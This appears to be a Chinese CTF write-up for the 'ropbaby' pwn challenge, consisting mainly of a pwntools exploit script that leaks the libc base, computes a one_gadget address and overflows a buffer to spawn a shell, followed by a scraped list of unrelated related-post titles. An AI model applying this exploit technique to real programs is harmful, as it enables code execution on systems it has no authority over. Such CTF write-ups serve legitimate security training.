• 分析
    1.先查看文件位数,安全机制
    2.查看strings,调用函数(特别注意常见的函数)
  • 漏洞点
  • EXP
from pwn import *
context.log_level = "debug"p = process('./ropbaby')p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+libp.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')
p.sendline('4')  #让题目正常退出
p.interactive()

1.实验吧_ropbaby(西普杯CTF)_onegadget相关推荐

  1. 2016 西普杯丶天津CTF预选赛(3/6)

    哆啦A梦(图片隐写) 格式:SimCTF{ } 解:放到kail中binwalk一下(Binwalk是一个固件的分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处.简单易用,完全自动化脚本,并 ...

  2. 常熟理工php实验三_西普学院(实验吧)Web题解

    1.你能跨过去吗? Key Words:XSS 根据提示考察XSS,看给出的链接需要的是编解码 http://www.test.com/NodeMore.jsp?id=672613&page= ...

  3. 西普杯铁三2018——数据赛

    重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG 0x01 网站后台密码是多少? 打开第二个数据包 passwd:aabbcc 0x02 攻击者IP是多少? 由上图得出为202.1.1.2 ...

  4. 2018西普杯铁三西北赛区流量分析

    经典流量分析题目,每次都要拿出来用索性整理好下次方便点 本文所用的WireShark语法 http 显示出所有的HTTP协议数据 ip.addr == xxxx 显示出所有数据中地址为xxxx的包 i ...

  5. 西普部分CTF题目(逆向)

    1.阿拉丁神灯http://ctf1.simplexue.com/crack/1/ 这个比较简单,用ida加载后,函数列表里有Button1_click,点击进去后发现 这里有个比较函数,应该是输入的 ...

  6. 【突发】西普教育实验吧NISP网站故障

    北京西普阳光教育科技股份有限公司(简称"西普教育")是国内有名的网络安全教育培训机构.如果你不知道这家公司,或许你听说过网络安全行业有名的在线平台"实验吧"-- ...

  7. 【西普实验吧】求解!

    求解!分值:10 来源: 西普学院难度:易参与人数:3497人Get Flag:251人答题人数:286人解题通过率:88% 密文xztiofwhf是用仿射函数y=5x+11加密得到的 解题链接: 通 ...

  8. [网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF、文件上传、SQL注入、代码审计、中国蚁剑)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut.hate_ ...

  9. 西普学院逆向writeup ---------你会吗??

    西普学院逆向writeup ---------你会吗?? --------跳跳龙 明天我们学校就要ctf比赛,深夜前10几分钟正好解了一道逆向题,是西普学院的,昨天,在小强的提醒下,也解了一道,今天就 ...

最新文章

  1. 查sqlserver表结构说明的方法
  2. 皮一皮:程序猿表示这点不够退休...
  3. 面向对象的模型设计方法
  4. bzoj 2251: [2010Beijing Wc]外星联络
  5. 关于数据仓库 — 总体工具介绍
  6. 【Ynoi2011】成都七中【树论】【点分树】【离线】【树状数组】
  7. http拨测是什么意思_HTTP 501 是什么意思?
  8. 物理实验数据处理(c语言)
  9. 安装 Nexus——war版本
  10. Spring MVC国际化(i18n)和本地化(L10n)示例
  11. java post 403_求助啊。。。。。。给服务器POST JSON报403
  12. 微信小程序开发学习资料
  13. 音频音乐与计算机的交融-音频音乐技术
  14. Android 在一个APP内打开另一个APP
  15. CSS 样式书写规范,css样式书写规范
  16. PE制作-001.UEFI和Legacy双启动U盘文件结构
  17. HTML设置页面动画效果有几种,前端制作动画的几种方式(css3,js)
  18. N诺刷题——字符串、排序、查找、链表
  19. JavaScript学习笔记(二)
  20. 如何把canvas元素作为网站背景总结详解

热门文章

  1. 数据库知识体系搭建思维导图(上)
  2. Hamibot自动化脚本京东茅台脚本蚂蚁森林能量脚本
  3. 解释linux中的三种重定向,Linux重定向及反弹shell详解
  4. python中实现网页解析的三种工具分别是_对Python3 解析html的几种操作方式小结
  5. 商城秒杀活动实现思路
  6. 桥梁结构三维扫描_桥梁三维逆向建模
  7. android 之 静态内部类 单例模式
  8. 应用宝7.0版正式发布 生活服务全“智”升级
  9. 八进制转换成十进制,十进制转换成八进制
  10. 今天是清明节放假的最后一天